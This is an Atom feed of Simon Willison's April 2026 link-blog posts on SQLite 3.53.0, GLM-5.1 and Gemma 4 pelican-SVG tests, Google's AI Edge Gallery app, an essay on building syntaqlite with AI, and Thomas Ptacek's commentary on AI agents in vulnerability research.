<?xml version="1.0" encoding="utf-8"?>
<feed xml:lang="en-us" xmlns="http://www.w3.org/2005/Atom"><title>Simon Willison's Weblog: Blogmarks</title><link href="http://simonwillison.net/" rel="alternate"/><link href="http://simonwillison.net/atom/links/" rel="self"/><id>http://simonwillison.net/</id><updated>2026-04-11T19:56:53+00:00</updated><author><name>Simon Willison</name></author><entry><title>SQLite 3.53.0</title><link href="https://simonwillison.net/2026/Apr/11/sqlite/#atom-blogmarks" rel="alternate"/><published>2026-04-11T19:56:53+00:00</published><updated>2026-04-11T19:56:53+00:00</updated><id>https://simonwillison.net/2026/Apr/11/sqlite/#atom-blogmarks</id><summary type="html">
&lt;p&gt;&lt;strong&gt;&lt;a href="https://sqlite.org/releaselog/3_53_0.html"&gt;SQLite 3.53.0&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;SQLite 3.52.0 was withdrawn, so this is a pretty big release with a whole lot of accumulated user-facing and internal improvements. Some that stood out to me:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;ALTER TABLE&lt;/code&gt; can now add and remove &lt;code&gt;NOT NULL&lt;/code&gt; and &lt;code&gt;CHECK&lt;/code&gt; constraints - I've previously used my own &lt;a href="https://sqlite-utils.datasette.io/en/stable/python-api.html#changing-not-null-status"&gt;sqlite-utils transform() method&lt;/a&gt; for this.&lt;/li&gt;
&lt;li&gt;New &lt;a href="https://sqlite.org/json1.html#jarrayins"&gt;json_array_insert() function&lt;/a&gt; and its &lt;code&gt;jsonb&lt;/code&gt; equivalent.&lt;/li&gt;
&lt;li&gt;Significant improvements to &lt;a href="https://sqlite.org/climode.html"&gt;CLI mode&lt;/a&gt;, including result formatting.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The result formatting improvements come from a new library, the &lt;a href="https://sqlite.org/src/file/ext/qrf"&gt;Query Results Formatter&lt;/a&gt;. I &lt;a href="https://github.com/simonw/tools/pull/266"&gt;had Claude Code&lt;/a&gt; (on my phone) compile that to WebAssembly and build &lt;a href="https://tools.simonwillison.net/sqlite-qrf"&gt;this playground interface&lt;/a&gt; for trying that out.&lt;/p&gt;

    &lt;p&gt;&lt;small&gt;Via &lt;a href="https://lobste.rs/s/sqsb24/sqlite_3_53_0"&gt;Lobste.rs&lt;/a&gt;&lt;/small&gt;&lt;/p&gt;


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/sql"&gt;sql&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/sqlite"&gt;sqlite&lt;/a&gt;&lt;/p&gt;

</summary><category term="sql"/><category term="sqlite"/></entry><entry><title>GLM-5.1: Towards Long-Horizon Tasks</title><link href="https://simonwillison.net/2026/Apr/7/glm-51/#atom-blogmarks" rel="alternate"/><published>2026-04-07T21:25:14+00:00</published><updated>2026-04-07T21:25:14+00:00</updated><id>https://simonwillison.net/2026/Apr/7/glm-51/#atom-blogmarks</id><summary type="html">
&lt;p&gt;&lt;strong&gt;&lt;a href="https://z.ai/blog/glm-5.1"&gt;GLM-5.1: Towards Long-Horizon Tasks&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Chinese AI lab Z.ai's latest model is a giant 754B parameter 1.51TB (on &lt;a href="https://huggingface.co/zai-org/GLM-5.1"&gt;Hugging Face&lt;/a&gt;) MIT-licensed monster - the same size as their previous GLM-5 release, and sharing the &lt;a href="https://huggingface.co/papers/2602.15763"&gt;same paper&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;It's available &lt;a href="https://openrouter.ai/z-ai/glm-5.1"&gt;via OpenRouter&lt;/a&gt; so I asked it to draw me a pelican:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;llm install llm-openrouter
llm -m openrouter/z-ai/glm-5.1 'Generate an SVG of a pelican on a bicycle'
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;And something new happened... unprompted, the model &lt;a href="https://gist.github.com/simonw/af7170f54256cc007ef28a8721564be8"&gt;decided to give me&lt;/a&gt; an HTML page that included both the SVG and a separate set of CSS animations!&lt;/p&gt;
&lt;p&gt;The SVG was excellent, and might be my new favorite from an open weights model:&lt;/p&gt;
&lt;p&gt;&lt;img alt="The bicycle is red and has a frame the correct shape and wheels with spokes. The pelican is a perky little fella." src="https://static.simonwillison.net/static/2026/glm-5.1-pelican.png" /&gt;&lt;/p&gt;
&lt;p&gt;But the animation &lt;a href="https://gisthost.github.io/?73bb6808b18c2482f66e5f082c75f36e"&gt;broke it&lt;/a&gt;:&lt;/p&gt;
&lt;p&gt;&lt;img alt="Animation - the wheels and pedals rotate, the clouds move... and the pelican has vanished, but there is a little blob bobbing up and down in the top left corner." src="https://static.simonwillison.net/static/2026/glm-5.1-broken-light-lossy.gif" /&gt;&lt;/p&gt;
&lt;p&gt;That's the pelican, floating up in the top left corner.&lt;/p&gt;
&lt;p&gt;I usually don't do follow-up prompts for the pelican test, but in this case I made an exception:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;llm -c 'the animation is a bit broken, the pelican ends up positioned off the screen at the top right'
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;GLM 5.1 replied:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;The issue is that CSS &lt;code&gt;transform&lt;/code&gt; animations on SVG elements override the SVG &lt;code&gt;transform&lt;/code&gt; attribute used for positioning, causing the pelican to lose its placement and fly off to the top-right. The fix is to separate positioning (SVG attribute) from animation (inner group) and use &lt;code&gt;&amp;lt;animateTransform&amp;gt;&lt;/code&gt; for SVG rotations since it handles coordinate systems correctly.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;And spat out &lt;a href="https://static.simonwillison.net/static/2026/glm-5.1-pelican-fixed.html"&gt;fresh HTML&lt;/a&gt; which fixed the problem!&lt;/p&gt;
&lt;p&gt;&lt;img alt="Now everything is right - the bicycle rotates correctly, the pelican sits on it and bobs up and down, and its lower beak moves slightly as well." src="https://static.simonwillison.net/static/2026/glm-5.1-pelican-fixed-medium-lossy.gif" /&gt;&lt;/p&gt;
&lt;p&gt;I particularly like the animation of the beak, which is described in the SVG comments like so:&lt;/p&gt;
&lt;div class="highlight highlight-text-xml-svg"&gt;&lt;pre&gt;&lt;span class="pl-c"&gt;&lt;span class="pl-c"&gt;&amp;lt;!--&lt;/span&gt; Pouch (lower beak) with wobble &lt;span class="pl-c"&gt;--&amp;gt;&lt;/span&gt;&lt;/span&gt;
&amp;lt;&lt;span class="pl-ent"&gt;g&lt;/span&gt;&amp;gt;
    &amp;lt;&lt;span class="pl-ent"&gt;path&lt;/span&gt; &lt;span class="pl-e"&gt;d&lt;/span&gt;=&lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;M42,-58 Q43,-50 48,-42 Q55,-35 62,-38 Q70,-42 75,-60 L42,-58 Z&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt; &lt;span class="pl-e"&gt;fill&lt;/span&gt;=&lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;url(#pouchGrad)&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt; &lt;span class="pl-e"&gt;stroke&lt;/span&gt;=&lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;#b06008&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt; &lt;span class="pl-e"&gt;stroke-width&lt;/span&gt;=&lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;1&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt; &lt;span class="pl-e"&gt;opacity&lt;/span&gt;=&lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;0.9&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt;/&amp;gt;
    &amp;lt;&lt;span class="pl-ent"&gt;path&lt;/span&gt; &lt;span class="pl-e"&gt;d&lt;/span&gt;=&lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;M48,-50 Q55,-46 60,-52&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt; &lt;span class="pl-e"&gt;fill&lt;/span&gt;=&lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;none&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt; &lt;span class="pl-e"&gt;stroke&lt;/span&gt;=&lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;#c06a08&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt; &lt;span class="pl-e"&gt;stroke-width&lt;/span&gt;=&lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;0.8&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt; &lt;span class="pl-e"&gt;opacity&lt;/span&gt;=&lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;0.6&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt;/&amp;gt;
    &amp;lt;&lt;span class="pl-ent"&gt;animateTransform&lt;/span&gt; &lt;span class="pl-e"&gt;attributeName&lt;/span&gt;=&lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;transform&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt; &lt;span class="pl-e"&gt;type&lt;/span&gt;=&lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;scale&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt;
    &lt;span class="pl-e"&gt;values&lt;/span&gt;=&lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;1,1; 1.03,0.97; 1,1&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt; &lt;span class="pl-e"&gt;dur&lt;/span&gt;=&lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;0.75s&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt; &lt;span class="pl-e"&gt;repeatCount&lt;/span&gt;=&lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;indefinite&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt;
    &lt;span class="pl-e"&gt;additive&lt;/span&gt;=&lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;sum&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt;/&amp;gt;
&amp;lt;/&lt;span class="pl-ent"&gt;g&lt;/span&gt;&amp;gt;&lt;/pre&gt;&lt;/div&gt;

&lt;p&gt;&lt;strong&gt;Update&lt;/strong&gt;: On Bluesky &lt;a href="https://bsky.app/profile/charles.capps.me/post/3miwrn42mjc2t"&gt;@charles.capps.me suggested&lt;/a&gt; a "NORTH VIRGINIA OPOSSUM ON AN E-SCOOTER" and...&lt;/p&gt;
&lt;p&gt;&lt;img alt="This is so great. It's dark, the possum is clearly a possum, it's riding an escooter, lovely animation, tail bobbing up and down, caption says NORTH VIRGINIA OPOSSUM, CRUISING THE COMMONWEALTH SINCE DUSK - only glitch is that it occasionally blinks and the eyes fall off the face" src="https://static.simonwillison.net/static/2026/glm-possum-escooter.gif.gif" /&gt;&lt;/p&gt;
&lt;p&gt;The HTML+SVG comments on that one include &lt;code&gt;/* Earring sparkle */, &amp;lt;!-- Opossum fur gradient --&amp;gt;, &amp;lt;!-- Distant treeline silhouette - Virginia pines --&amp;gt;, &amp;lt;!-- Front paw on handlebar --&amp;gt;&lt;/code&gt; - here's &lt;a href="https://gist.github.com/simonw/1864b89f5304eba03c3ded4697e156c4"&gt;the transcript&lt;/a&gt; and the &lt;a href="https://static.simonwillison.net/static/2026/glm-possum-escooter.html"&gt;HTML result&lt;/a&gt;.&lt;/p&gt;


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/css"&gt;css&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/svg"&gt;svg&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai"&gt;ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/generative-ai"&gt;generative-ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llms"&gt;llms&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/pelican-riding-a-bicycle"&gt;pelican-riding-a-bicycle&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llm-release"&gt;llm-release&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai-in-china"&gt;ai-in-china&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/glm"&gt;glm&lt;/a&gt;&lt;/p&gt;

</summary><category term="css"/><category term="svg"/><category term="ai"/><category term="generative-ai"/><category term="llms"/><category term="pelican-riding-a-bicycle"/><category term="llm-release"/><category term="ai-in-china"/><category term="glm"/></entry><entry><title>Google AI Edge Gallery</title><link href="https://simonwillison.net/2026/Apr/6/google-ai-edge-gallery/#atom-blogmarks" rel="alternate"/><published>2026-04-06T05:18:26+00:00</published><updated>2026-04-06T05:18:26+00:00</updated><id>https://simonwillison.net/2026/Apr/6/google-ai-edge-gallery/#atom-blogmarks</id><summary type="html">
&lt;p&gt;&lt;strong&gt;&lt;a href="https://apps.apple.com/nl/app/google-ai-edge-gallery/id6749645337"&gt;Google AI Edge Gallery&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Terrible name, really great app: this is Google's official app for running their Gemma 4 models (the E2B and E4B sizes, plus some members of the Gemma 3 family) directly on your iPhone.&lt;/p&gt;
&lt;p&gt;It works &lt;em&gt;really&lt;/em&gt; well. The E2B model is a 2.54GB download and is both fast and genuinely useful.&lt;/p&gt;
&lt;p&gt;The app also provides "ask questions about images" and audio transcription (up to 30s) with the two small Gemma 4 models, and has an interesting "skills" demo which demonstrates tool calling against eight different interactive widgets, each implemented as an HTML page (though sadly the source code is not visible): interactive-map, kitchen-adventure, calculate-hash, text-spinner, mood-tracker, mnemonic-password, query-wikipedia, and qr-code.&lt;/p&gt;
&lt;p&gt;&lt;img src="https://static.simonwillison.net/static/2026/gemini-agent-skills.jpg" alt="Screenshot of an &amp;quot;Agent Skills&amp;quot; chat interface using the Gemma-4-E2B-it model. The user prompt reads &amp;quot;Show me the Castro Theatre on a map.&amp;quot; The model response, labeled &amp;quot;Model on GPU,&amp;quot; shows it &amp;quot;Called JS skill &amp;#39;interactive-map/index.html&amp;#39;&amp;quot; and displays an embedded Google Map centered on a red pin at The Castro Theatre in San Francisco, with nearby landmarks visible including Starbelly, Cliff&amp;#39;s Variety, Blind Butcher, GLBT Historical Society Museum, and Fable. An &amp;quot;Open in Maps&amp;quot; link and &amp;quot;View in full screen&amp;quot; button are shown. Below the map, the model states &amp;quot;The interactive map view for the Castro Theatre has been shown.&amp;quot; with a response time of 2.4 s. A text input field with &amp;quot;Type prompt...&amp;quot; placeholder, a &amp;quot;+&amp;quot; button, and a &amp;quot;Skills&amp;quot; button appear at the bottom." style="max-width: min(400px, 100%); margin: 0 auto; display: block;"&gt;&lt;/p&gt;
&lt;p&gt;(That demo did freeze the app when I tried to add a follow-up prompt though.)&lt;/p&gt;
&lt;p&gt;This is the first time I've seen a local model vendor release an official app for trying out their models on an iPhone. Sadly it's missing permanent logs - conversations with this app are ephemeral.&lt;/p&gt;

    &lt;p&gt;&lt;small&gt;Via &lt;a href="https://news.ycombinator.com/item?id=47652561"&gt;Hacker News&lt;/a&gt;&lt;/small&gt;&lt;/p&gt;


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/google"&gt;google&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/iphone"&gt;iphone&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai"&gt;ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/generative-ai"&gt;generative-ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/local-llms"&gt;local-llms&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llms"&gt;llms&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/gemini"&gt;gemini&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llm-tool-use"&gt;llm-tool-use&lt;/a&gt;&lt;/p&gt;

</summary><category term="google"/><category term="iphone"/><category term="ai"/><category term="generative-ai"/><category term="local-llms"/><category term="llms"/><category term="gemini"/><category term="llm-tool-use"/></entry><entry><title>Eight years of wanting, three months of building with AI</title><link href="https://simonwillison.net/2026/Apr/5/building-with-ai/#atom-blogmarks" rel="alternate"/><published>2026-04-05T23:54:18+00:00</published><updated>2026-04-05T23:54:18+00:00</updated><id>https://simonwillison.net/2026/Apr/5/building-with-ai/#atom-blogmarks</id><summary type="html">
&lt;p&gt;&lt;strong&gt;&lt;a href="https://lalitm.com/post/building-syntaqlite-ai/"&gt;Eight years of wanting, three months of building with AI&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Lalit Maganti provides one of my favorite pieces of long-form writing on agentic engineering I've seen in ages.&lt;/p&gt;
&lt;p&gt;They spent eight years thinking about and then three months building &lt;a href="https://github.com/lalitMaganti/syntaqlite"&gt;syntaqlite&lt;/a&gt;, which they describe as "&lt;a href="https://lalitm.com/post/syntaqlite/"&gt;high-fidelity devtools that SQLite deserves&lt;/a&gt;".&lt;/p&gt;
&lt;p&gt;The goal was to provide fast, robust and comprehensive linting and verifying tools for SQLite, suitable for use in language servers and other development tools - a parser, formatter, and verifier for SQLite queries. I've found myself wanting this kind of thing in the past, hence my (far less production-ready) &lt;a href="https://simonwillison.net/2026/Jan/30/sqlite-ast-2/"&gt;sqlite-ast&lt;/a&gt; project from a few months ago.&lt;/p&gt;
&lt;p&gt;Lalit had been procrastinating on this project for years, because of the inevitable tedium of needing to work through 400+ grammar rules to help build a parser. That's exactly the kind of tedious work that coding agents excel at!&lt;/p&gt;
&lt;p&gt;Claude Code helped get over that initial hump and build the first prototype:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;AI basically let me put aside all my doubts on technical calls, my uncertainty of building the right thing and my reluctance to get started by giving me very concrete problems to work on. Instead of “I need to understand how SQLite’s parsing works”, it was “I need to get AI to suggest an approach for me so I can tear it up and build something better". I work so much better with concrete prototypes to play with and code to look at than endlessly thinking about designs in my head, and AI lets me get to that point at a pace I could not have dreamed about before. Once I took the first step, every step after that was so much easier.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;That first vibe-coded prototype worked great as a proof of concept, but they eventually made the decision to throw it away and start again from scratch. AI worked great for the low level details but did not produce a coherent high-level architecture:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;I found that AI made me procrastinate on key design decisions. Because refactoring was cheap, I could always say “I’ll deal with this later.” And because AI could refactor at the same industrial scale it generated code, the cost of deferring felt low. But it wasn’t: deferring decisions corroded my ability to think clearly because the codebase stayed confusing in the meantime.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The second attempt took a lot longer and involved a great deal more human-in-the-loop decision making, but the result is a robust library that can stand the test of time.&lt;/p&gt;
&lt;p&gt;It's worth setting aside some time to read this whole thing - it's full of non-obvious downsides to working heavily with AI, as well as a detailed explanation of how they overcame those hurdles.&lt;/p&gt;
&lt;p&gt;The key idea I took away from this concerns AI's weakness in terms of design and architecture:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;When I was working on something where I didn’t even know what I wanted, AI was somewhere between unhelpful and harmful. The architecture of the project was the clearest case: I spent weeks in the early days following AI down dead ends, exploring designs that felt productive in the moment but collapsed under scrutiny. In hindsight, I have to wonder if it would have been faster just thinking it through without AI in the loop at all.&lt;/p&gt;
&lt;p&gt;But expertise alone isn’t enough. Even when I understood a problem deeply, AI still struggled if the task had no objectively checkable answer. Implementation has a right answer, at least at a local level: the code compiles, the tests pass, the output matches what you asked for. Design doesn’t. We’re still arguing about OOP decades after it first took off.&lt;/p&gt;
&lt;/blockquote&gt;

    &lt;p&gt;&lt;small&gt;Via &lt;a href="https://news.ycombinator.com/item?id=47648828"&gt;Hacker News&lt;/a&gt;&lt;/small&gt;&lt;/p&gt;


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/sqlite"&gt;sqlite&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai"&gt;ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/generative-ai"&gt;generative-ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llms"&gt;llms&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai-assisted-programming"&gt;ai-assisted-programming&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/vibe-coding"&gt;vibe-coding&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/agentic-engineering"&gt;agentic-engineering&lt;/a&gt;&lt;/p&gt;

</summary><category term="sqlite"/><category term="ai"/><category term="generative-ai"/><category term="llms"/><category term="ai-assisted-programming"/><category term="vibe-coding"/><category term="agentic-engineering"/></entry><entry><title>Vulnerability Research Is Cooked</title><link href="https://simonwillison.net/2026/Apr/3/vulnerability-research-is-cooked/#atom-blogmarks" rel="alternate"/><published>2026-04-03T23:59:08+00:00</published><updated>2026-04-03T23:59:08+00:00</updated><id>https://simonwillison.net/2026/Apr/3/vulnerability-research-is-cooked/#atom-blogmarks</id><summary type="html">
&lt;p&gt;&lt;strong&gt;&lt;a href="https://sockpuppet.org/blog/2026/03/30/vulnerability-research-is-cooked/"&gt;Vulnerability Research Is Cooked&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Thomas Ptacek's take on the sudden and enormous impact the latest frontier models are having on the field of vulnerability research.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Within the next few months, coding agents will drastically alter both the practice and the economics of exploit development. Frontier model improvement won’t be a slow burn, but rather a step function. Substantial amounts of high-impact vulnerability research (maybe even most of it) will happen simply by pointing an agent at a source tree and typing “find me zero days”.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Why are agents so good at this? A combination of baked-in knowledge, pattern matching ability and brute force:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;You can't design a better problem for an LLM agent than exploitation research.&lt;/p&gt;
&lt;p&gt;Before you feed it a single token of context, a frontier LLM already encodes supernatural amounts of correlation across vast bodies of source code. Is the Linux KVM hypervisor connected to the &lt;code&gt;hrtimer&lt;/code&gt; subsystem, &lt;code&gt;workqueue&lt;/code&gt;, or &lt;code&gt;perf_event&lt;/code&gt;? The model knows.&lt;/p&gt;
&lt;p&gt;Also baked into those model weights: the complete library of documented "bug classes" on which all exploit development builds: stale pointers, integer mishandling, type confusion, allocator grooming, and all the known ways of promoting a wild write to a controlled 64-bit read/write in Firefox.&lt;/p&gt;
&lt;p&gt;Vulnerabilities are found by pattern-matching bug classes and constraint-solving for reachability and exploitability. Precisely the implicit search problems that LLMs are most gifted at solving. Exploit outcomes are straightforwardly testable success/failure trials. An agent never gets bored and will search forever if you tell it to.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The article was partly inspired by &lt;a href="https://securitycryptographywhatever.com/2026/03/25/ai-bug-finding/"&gt;this episode of the Security Cryptography Whatever podcast&lt;/a&gt;, where David Adrian, Deirdre Connolly, and Thomas interviewed Anthropic's Nicholas Carlini for 1 hour 16 minutes.&lt;/p&gt;
&lt;p&gt;I just started a new tag here for &lt;a href="https://simonwillison.net/tags/ai-security-research/"&gt;ai-security-research&lt;/a&gt; - it's up to 11 posts already.&lt;/p&gt;


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/security"&gt;security&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/thomas-ptacek"&gt;thomas-ptacek&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/careers"&gt;careers&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai"&gt;ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/generative-ai"&gt;generative-ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llms"&gt;llms&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/nicholas-carlini"&gt;nicholas-carlini&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai-ethics"&gt;ai-ethics&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai-security-research"&gt;ai-security-research&lt;/a&gt;&lt;/p&gt;

</summary><category term="security"/><category term="thomas-ptacek"/><category term="careers"/><category term="ai"/><category term="generative-ai"/><category term="llms"/><category term="nicholas-carlini"/><category term="ai-ethics"/><category term="ai-security-research"/></entry><entry><title>Gemma 4: Byte for byte, the most capable open models</title><link href="https://simonwillison.net/2026/Apr/2/gemma-4/#atom-blogmarks" rel="alternate"/><published>2026-04-02T18:28:54+00:00</published><updated>2026-04-02T18:28:54+00:00</updated><id>https://simonwillison.net/2026/Apr/2/gemma-4/#atom-blogmarks</id><summary type="html">
&lt;p&gt;&lt;strong&gt;&lt;a href="https://blog.google/innovation-and-ai/technology/developers-tools/gemma-4/"&gt;Gemma 4: Byte for byte, the most capable open models&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Four new vision-capable Apache 2.0 licensed reasoning LLMs from Google DeepMind, sized at 2B, 4B, 31B, plus a 26B-A4B Mixture-of-Experts.&lt;/p&gt;
&lt;p&gt;Google emphasize "unprecedented level of intelligence-per-parameter", providing yet more evidence that creating small useful models is one of the hottest areas of research right now.&lt;/p&gt;
&lt;p&gt;They actually label the two smaller models as E2B and E4B for "Effective" parameter size. The system card explains:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;The smaller models incorporate Per-Layer Embeddings (PLE) to maximize parameter efficiency in on-device deployments. Rather than adding more layers or parameters to the model, PLE gives each decoder layer its own small embedding for every token. These embedding tables are large but are only used for quick lookups, which is why the effective parameter count is much smaller than the total.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;I don't entirely understand that, but apparently that's what the "E" in E2B means!&lt;/p&gt;
&lt;p&gt;One particularly exciting feature of these models is that they are multi-modal beyond just images:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Vision and audio&lt;/strong&gt;: All models natively process video and images, supporting variable resolutions, and excelling at visual tasks like OCR and chart understanding. Additionally, the E2B and E4B models feature native audio input for speech recognition and understanding.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;I've not figured out a way to run audio input locally - I don't think that feature is in LM Studio or Ollama yet.&lt;/p&gt;
&lt;p&gt;I tried them out using the GGUFs for &lt;a href="https://lmstudio.ai/models/gemma-4"&gt;LM Studio&lt;/a&gt;. The 2B (4.41GB), 4B (6.33GB) and 26B-A4B (17.99GB) models all worked perfectly, but the 31B (19.89GB) model was broken and spat out &lt;code&gt;"---\n"&lt;/code&gt; in a loop for every prompt I tried.&lt;/p&gt;
&lt;p&gt;The succession of &lt;a href="https://gist.github.com/simonw/12ae4711288637a722fd6bd4b4b56bdb"&gt;pelican quality&lt;/a&gt; from 2B to 4B to 26B-A4B is notable:&lt;/p&gt;
&lt;p&gt;E2B:&lt;/p&gt;
&lt;p&gt;&lt;img alt="Two blue circles on a brown rectangle and a weird mess of orange blob and yellow triangle for the pelican" src="https://static.simonwillison.net/static/2026/gemma-4-2b-pelican.png" /&gt;&lt;/p&gt;
&lt;p&gt;E4B:&lt;/p&gt;
&lt;p&gt;&lt;img alt="Two black wheels joined by a sort of grey surfboard, the pelican is semicircles and a blue blob floating above it" src="https://static.simonwillison.net/static/2026/gemma-4-4b-pelican.png" /&gt;&lt;/p&gt;
&lt;p&gt;26B-A4B:&lt;/p&gt;
&lt;p&gt;&lt;img alt="Bicycle has the right pieces although the frame is wonky. Pelican is genuinely good, has a big triangle beak and a nice curved neck and is clearly a bird that is sitting on the bicycle" src="https://static.simonwillison.net/static/2026/gemma-4-26b-pelican.png" /&gt;&lt;/p&gt;
&lt;p&gt;(This one actually had an SVG error - "error on line 18 at column 88: Attribute x1 redefined" - but after &lt;a href="https://gist.github.com/simonw/12ae4711288637a722fd6bd4b4b56bdb?permalink_comment_id=6074105#gistcomment-6074105"&gt;fixing that&lt;/a&gt; I got probably the best pelican I've seen yet from a model that runs on my laptop.)&lt;/p&gt;
&lt;p&gt;Google are providing API access to the two larger Gemma models via their &lt;a href="https://aistudio.google.com/prompts/new_chat?model=gemma-4-31b-it"&gt;AI Studio&lt;/a&gt;. I added support to &lt;a href="https://github.com/simonw/llm-gemini"&gt;llm-gemini&lt;/a&gt; and then &lt;a href="https://gist.github.com/simonw/f9f9e9c34c7cc0ef5325a2876413e51e"&gt;ran a pelican&lt;/a&gt; through the 31B model using that:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;llm -m gemini/gemma-4-31b-it 'Generate an SVG of a pelican riding a bicycle'
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Pretty good, though it is missing the front part of the bicycle frame:&lt;/p&gt;
&lt;p&gt;&lt;img alt="Motion blur lines, a mostly great bicycle albeit missing the front part of the frame. Pelican is decent. " src="https://static.simonwillison.net/static/2026/gemma-4-31b-pelican.png" /&gt;


